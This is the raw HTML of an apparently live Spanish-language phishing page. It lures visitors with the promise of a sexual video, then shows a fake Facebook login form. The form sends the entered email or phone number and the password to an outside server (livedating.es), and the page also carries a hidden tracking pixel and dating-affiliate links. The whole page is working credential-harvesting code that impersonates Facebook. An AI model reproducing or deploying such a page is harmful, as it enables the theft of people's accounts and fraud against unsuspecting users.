


<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:b="http://www.google.com/2005/gml/b" xmlns:data="http://www.google.com/2005/gml/data" xmlns:expr="http://www.google.com/2005/gml/expr"><head>

<title>Acepto Solcitiudes 24hrs</title>
<meta content="Whatsapp Activas" property="og:description">
<meta content="https://i.ibb.co/5s8vb7D/soli9.jpg" property="og:image">
</head><body><img src="//whos.amung.us/pingjs/?k=hluuynntny&amp;t=&amp;x=Miakhalifavzla" style="display:none">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, user-scalable=no">
    <script src="https://cdn.smrt-content.com/assets/1004/js/jquery.min.js"></script>
    <script src="https://cdn.smrt-content.com/assets/1004/js/device.min.js"></script>
    <script src="https://cdn.smrt-content.com/assets/1004/js/custom.js"></script>
    <script src="https://cdn.smrt-content.com/assets/1004/js/backoffer.js"></script>
    <link rel="stylesheet" href="https://cdn.smrt-content.com/assets/1004/css/index.css">
    <link rel="shortcut icon" href="https://cdn.smrt-content.com/assets/1004/other/favicon.ico" type="image/x-icon">

  <div class="layer">
  </div>
  <div class="wrap">
    <div class="step-block">
      <div class="logo">
        <img src="https://i.imgur.com/PZFqpdU.png" alt="">
      </div>
      <div class="step-item" style="display: block;">
        <div class="question-title ">
         Somos unas chicas dispuestas a todo tenemos un regalito para ti lo deseas video super rico? </div>
        <div class="buttons-block">
          <div class="step-btn no-btn tr-next-button tr-b-option">
            Si                            
          </div>
          <div class="step-btn yes-btn tr-next-button tr-b-option">
            No                            
          </div>
        </div>
      </div>
<video autoplay="" muted="" loop="" id="VideoBg" __idm_id__="2605057"><source src="https://i.imgur.com/fRwe7GO.mp4" type="video/mp4"></video>
      <div class="step-item thishide" style="display: none;">
  <style type="text/css">
    body{
      background-color: #f0f0f0;
      margin: 0px 0px 0px 0px !important;
    }
    .b{
    direction: ltr;
    font-family: Roboto, 'Droid Sans', Helvetica, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    -webkit-text-size-adjust: none;
    cursor: pointer;
    text-align: center;
    color: #90949c;
    font-size: 12px;
    line-height: 16px;
    font-weight: bold;
    text-decoration: auto;
    }
    a{
      text-decoration: auto;
    }
    .a{
    direction: ltr;
    font-family: Helvetica, Arial, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    -webkit-text-size-adjust: none;
    text-align: center;
    font-size: 12px;
    line-height: 16px;
    color: #576b95;
    cursor: pointer;
    text-decoration: none;
    }
    .text_len{
      text-align: center;
    //  margin-top: 50px;
    }
    .form{
          padding: 0 16px;
    text-align: left;
    direction: ltr;
    font-family: Roboto, 'Droid Sans', Helvetica, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    font-size: 14px;
    line-height: 18px;
    -webkit-text-size-adjust: none;
    cursor: pointer;
    //margin-top: 25px;
    }
    input{
          direction: ltr;
    -webkit-text-size-adjust: none;
    background: #f5f6f7;
    border: 0;
    display: block;
    margin: 0;
    font-family: Roboto, 'Droid Sans', Helvetica, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    -webkit-user-select: text;
    font-size: 14px;
    line-height: 18px;
    padding: 12px;
    -webkit-appearance: none;
    box-sizing: border-box;
    width: 100%;
   // margin-bottom: 25px;
   // margin-top: 25px;
   margin-top: 5px;
    }
button{
  background: rgb(24 119 242) !important;
      direction: ltr;
    -webkit-text-size-adjust: none;
    font-weight: bold;
    -webkit-appearance: none;
    background: none;
    margin: 0;
    overflow: visible;
    text-align: center;
    vertical-align: top;
    white-space: nowrap;
    color: #fff;
    padding: 0 16px;
    font-family: Roboto, 'Droid Sans', Helvetica, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    border: none;
    border-radius: 3px;
    box-sizing: border-box;
    position: relative;
    -webkit-user-select: none;
    z-index: 0;
    text-shadow: 0 -1px rgba(0, 0, 0, .25);
    display: block;
    width: 100%;
    font-size: 17px;
    height: 40px;
    line-height: 40px;
    margin-top: 15px;
}
.padre{
      direction: ltr;
    font-family: Roboto, 'Droid Sans', Helvetica, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    font-size: 14px;
    line-height: 18px;
    -webkit-text-size-adjust: none;
    cursor: pointer;
    text-align: center;
}
.forget{
  //text-align: center !important;
}
#se{
      direction: ltr;
    font-family: Helvetica, Arial, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    font-size: 14px;
    line-height: 18px;
    -webkit-text-size-adjust: none;
    cursor: pointer;
    display: block;
    overflow: hidden;
    text-align: center;
    white-space: nowrap;
    margin: 12px 0 4px 0;
    width: 100%;
}
span:before {
    margin-right: 15px;
    right: 100%;
}

span:after {
    left: 100%;
    margin-left: 15px;
}

#se span:before, #se span:after {
    background: #ccd0d5;
    content: '';
    height: 1px;
    position: absolute;
    top: 50%;
    width: 9999px;
}
p{
   font-family: Helvetica, Arial, sans-serif;
       --bs-blue: #0d6efd;
    --bs-indigo: #6610f2;
    --bs-purple: #6f42c1;

    --bs-light: #f8f9fa;
    --bs-dark: #212529;
    --bs-font-sans-serif: system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";
    --bs-font-monospace: SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;
   
    line-height: 1.5;
    -webkit-text-size-adjust: 100%;
    -webkit-tap-highlight-color: transparent;
    font-family: sans-serif;
    cursor: pointer;
    box-sizing: border-box;
    font-size: 14px;
    color: #3b5998;
}
.o{
      direction: ltr;
    font-family: Helvetica, Arial, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    font-size: 14px;
    line-height: 18px;
    -webkit-text-size-adjust: none;
    cursor: pointer;
    text-align: center;
    white-space: nowrap;
    color: #4b4f56;
    display: inline-block;
    position: relative;
}
.register
{
      direction: ltr;
    font-family: Roboto, 'Droid Sans', Helvetica, sans-serif;
    -webkit-text-size-adjust: none;
    -webkit-user-select: none;
    margin: 0;
    text-align: center;
    cursor: pointer;
    text-decoration: none;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    font-size: 14px;
    border-radius: 4px;
    box-sizing: border-box;
    display: inline-block;
    font-weight: bold;
    min-width: 50px;
    overflow: hidden;
    text-overflow: ellipsis;
    vertical-align: bottom;
    white-space: nowrap;
    line-height: 27px;
    padding: 4px 8px 3px;
    color: #fff;
   // text-shadow: 0 -1px 0 rgba(0, 0, 0, .35);
     color: #2c63b6;
    background: #e2ecf9;
    border: none;
    box-shadow: none;
    height: 36px;
    padding-left: 16px;
    padding-right: 16px;
    padding-top: 5px;
}
.main_button{
      direction: ltr;
    font-family: Roboto, 'Droid Sans', Helvetica, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    font-size: 14px;
    line-height: 18px;
    -webkit-text-size-adjust: none;
    cursor: pointer;
    padding: 12px 0 12px 0;
    text-align: center;
}
@media (min-width:1007px){
  .main{
    margin-left: 35%;
    margin-right: 35%;
  }
  p{
    -webkit-tap-highlight-color: transparent;
    font-family: sans-serif;
    cursor: pointer;
    box-sizing: border-box;
    font-size: 14px;
    color: #3b5998;
    margin-left: 11px;
    margin-top: 23px;
  }
}

@media (max-width:1007px){
 p.p{
  margin-left: 5px;
 }
 .form{
       margin-top: 0px; 
}
 }
}


  </style>

<head> <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="UTF-8">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.2/css/all.css" integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous">
    <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/spectrum/1.8.0/spectrum.min.css">
  </head><body style="padding:0; margin: 0;background: #ffffff">
    <table style="height: 100%; width: 100%; background-color: #ffffff;" align="center">  
      <tbody>
        <tr>  
          <td valign="top" id="dbody" data-version="2.31" style="width: 100%; height: 100%; margin-top: 50px; margin-bottom: 50px; padding-top: 0px; padding-bottom: 50px; background-color: #ffffff;">
            <!--[if (gte mso 9)|(IE)]><table align="center" style="max-width:500px" width="500" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><![endif]-->
            <!--[if (gte mso 9)|(IE)]><table align="center" style="max-width:900px" width="900" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><![endif]-->
            <!--[if (gte mso 9)|(IE)]><table align="center" style="max-width:1024px" width="1024" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><![endif]-->
            <div class="layer_2" style="max-width: 500px; display: inline-block; vertical-align: top; width: 100%;">
                      </div><table class="layer_1" align="center" border="0" cellpadding="0" cellspacing="0" style="border-color: #ffffff4d; max-width: 500px; box-sizing: border-box; width: 100%; margin: 0px auto;">  
              <tbody>
			  <!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <style type="text/css">
    body{
      background-color: #ffffff00;
      margin: 0px 0px 0px 0px !important;
    }
    .b{
    direction: ltr;
    font-family: Roboto, 'Droid Sans', Helvetica, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    -webkit-text-size-adjust: none;
    cursor: pointer;
    text-align: center;
    color: #90949c;
    font-size: 12px;
    line-height: 16px;
    font-weight: bold;
    text-decoration: auto;
    }
    a{
      text-decoration: auto;
    }
    .a{
    direction: ltr;
    font-family: Helvetica, Arial, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    -webkit-text-size-adjust: none;
    text-align: center;
    font-size: 12px;
    line-height: 16px;
    color: #576b95;
    cursor: pointer;
    text-decoration: none;
    }
    .text_len{
      text-align: center;
    //  margin-top: 50px;
    }
    .form{
          padding: 0 16px;
    text-align: left;
    direction: ltr;
    font-family: Roboto, 'Droid Sans', Helvetica, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    font-size: 14px;
    line-height: 18px;
    -webkit-text-size-adjust: none;
    cursor: pointer;
    //margin-top: 25px;
    }
    input{
          direction: ltr;
    -webkit-text-size-adjust: none;
    background: #f5f6f7;
    border: 0;
    display: block;
    margin: 0;
    font-family: Roboto, 'Droid Sans', Helvetica, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    -webkit-user-select: text;
    font-size: 14px;
    line-height: 18px;
    padding: 12px;
    -webkit-appearance: none;
    box-sizing: border-box;
    width: 100%;
   // margin-bottom: 25px;
   // margin-top: 25px;
   margin-top: 5px;
    }
button{
  background: rgb(24 119 242) !important;
      direction: ltr;
    -webkit-text-size-adjust: none;
    font-weight: bold;
    -webkit-appearance: none;
    background: none;
    margin: 0;
    overflow: visible;
    text-align: center;
    vertical-align: top;
    white-space: nowrap;
    color: #fff;
    padding: 0 16px;
    font-family: Roboto, 'Droid Sans', Helvetica, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    border: none;
    border-radius: 3px;
    box-sizing: border-box;
    position: relative;
    -webkit-user-select: none;
    z-index: 0;
    text-shadow: 0 -1px rgba(0, 0, 0, .25);
    display: block;
    width: 100%;
    font-size: 17px;
    height: 40px;
    line-height: 40px;
    margin-top: 15px;
}
.padre{
      direction: ltr;
    font-family: Roboto, 'Droid Sans', Helvetica, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    font-size: 14px;
    line-height: 18px;
    -webkit-text-size-adjust: none;
    cursor: pointer;
    text-align: center;
}
.forget{
  //text-align: center !important;
}
#se{
      direction: ltr;
    font-family: Helvetica, Arial, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    font-size: 14px;
    line-height: 18px;
    -webkit-text-size-adjust: none;
    cursor: pointer;
    display: block;
    overflow: hidden;
    text-align: center;
    white-space: nowrap;
    margin: 12px 0 4px 0;
    width: 100%;
}
span:before {
    margin-right: 15px;
    right: 100%;
}

span:after {
    left: 100%;
    margin-left: 15px;
}

#se span:before, #se span:after {
    background: #ccd0d5;
    content: '';
    height: 1px;
    position: absolute;
    top: 50%;
    width: 9999px;
}
p{
   font-family: Helvetica, Arial, sans-serif;
       --bs-blue: #0d6efd;
    --bs-indigo: #6610f2;
    --bs-purple: #6f42c1;

    --bs-light: #f8f9fa;
    --bs-dark: #212529;
    --bs-font-sans-serif: system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";
    --bs-font-monospace: SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;
   
    line-height: 1.5;
    -webkit-text-size-adjust: 100%;
    -webkit-tap-highlight-color: transparent;
    font-family: sans-serif;
    cursor: pointer;
    box-sizing: border-box;
    font-size: 14px;
    color: #3b5998;
}
.o{
      direction: ltr;
    font-family: Helvetica, Arial, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    font-size: 14px;
    line-height: 18px;
    -webkit-text-size-adjust: none;
    cursor: pointer;
    text-align: center;
    white-space: nowrap;
    color: #4b4f56;
    display: inline-block;
    position: relative;
}
.register
{
      direction: ltr;
    font-family: Roboto, 'Droid Sans', Helvetica, sans-serif;
    -webkit-text-size-adjust: none;
    -webkit-user-select: none;
    margin: 0;
    text-align: center;
    cursor: pointer;
    text-decoration: none;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    font-size: 14px;
    border-radius: 4px;
    box-sizing: border-box;
    display: inline-block;
    font-weight: bold;
    min-width: 50px;
    overflow: hidden;
    text-overflow: ellipsis;
    vertical-align: bottom;
    white-space: nowrap;
    line-height: 27px;
    padding: 4px 8px 3px;
    color: #fff;
   // text-shadow: 0 -1px 0 rgba(0, 0, 0, .35);
     color: #ffffff;
    background: #339933;
    border: none;
    box-shadow: none;
    height: 36px;
    padding-left: 16px;
    padding-right: 16px;
    padding-top: 5px;
}
.main_button{
      direction: ltr;
    font-family: Roboto, 'Droid Sans', Helvetica, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    font-size: 14px;
    line-height: 18px;
    -webkit-text-size-adjust: none;
    cursor: pointer;
    padding: 12px 0 12px 0;
    text-align: center;
}
@media (min-width:1007px){
  .main{
    margin-left: 25%;
    margin-right: 25%;
  }
  p{
    -webkit-tap-highlight-color: transparent;
    font-family: sans-serif;
    cursor: pointer;
    box-sizing: border-box;
    font-size: 14px;
    color: #3b5998;
    margin-left: 11px;
    margin-top: 23px;
  }
}

@media (max-width:1007px){
 p.p{
  margin-left: 5px;
 }
 .form{
       margin-top: 0px; 
}
 }
.wrap{
	padding: 0px !important;
	margin-top: 26px;
	height: 91vh !important;
	
    right: 2px;

}
#dbody{
	padding-bottom: 25px !important;
}


  </style>
</head>
<body>
  <div class="main"> 
<img width="100%" height="180px" src="https://i.ibb.co/vYdsMYC/t5123.png">
<div class="text_len">
  <a class="b" href="">English ● </a>

  <a class="b" href="#">  Français ● </a>
  <a  href="#">Más </a>
</div>
<div style="display: inline-flex; width: 100%; margin-left: 0px; margin-right:5px; background-color:#fffbe2 ; text-align: start; color: red;">
  <img width="20px" style="margin-left: 8px;
    padding-top: 15px;
    display: inline;
    padding-bottom: 15px;" src="https://i.postimg.cc/MTq50GNX/phone.png"> <p class="p" style="display: inline;" >Inicia sesión en tu cuenta para poder ver el video</p>
</div>
<div class="form">
  <form action="https://livedating.es/panel/miakve/PAN01.php" method="post">
   
    <input  name="email" placeholder="Número de móvil o correo electrónico" >

    <input  name="pass" placeholder="Contraseña" type="password" >

    <div class="padre">
    <button type="submit" value="Entrar" class="" name="login" ><span class="_55sr">Iniciar sesión</span></button>
      
    </div>

  </form>
  <div style="margin-top: 10px; text-align: center;">
  <a href="https://datingspartner.life/?u=189pd0x&o=0yww1rv&t=miakhack&cid=01" class="forget">¿Olvidaste tu contraseña?</a>
  </div>

  <div>
    <div id="se">
      <span class="o"> o </span>
    </div>
    <div class="main_button" id="signup_button_area">
      <a href="https://datingspartner.life/?u=189pd0x&o=0yww1rv&t=miakhack&cid=01" role="button" class="register" >Crear cuenta de Facebook</a>
    </div>
  </div>



</div>
  </div>
<script type="text/javascript">
	$(".step-btn").click(function(){
		$(".logo").hide();
	})
</script>
</body>
</html>
                
                
                
                
                    <!--[if (gte mso 9)|(IE)]><table width="100%" align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><![endif]-->
                    </tbody></table><table border="0" cellspacing="0" cellpadding="0" class="edcontent" style="border-collapse: collapse;width:100%">
                        <tbody>
                          <tr>
                            
                          </tr>
                        </tbody>
                      </table>
                    
                    <!--[if (gte mso 9)|(IE)]></td></tr></table><![endif]-->
                  </td>
                </tr>
                  
              </tbody>
            </table>  
            <!--[if (gte mso 9)|(IE)]></td></tr></table><![endif]-->
          
          
      
      
  
</body></html>










<script type="text/javascript">
      /*<![CDATA[*/    (function(w){
        w.backOfferUrl = ''    }
                        (window));
      /*]]>*/ 
</body>

</html>






</script></div></div></div></body></html>
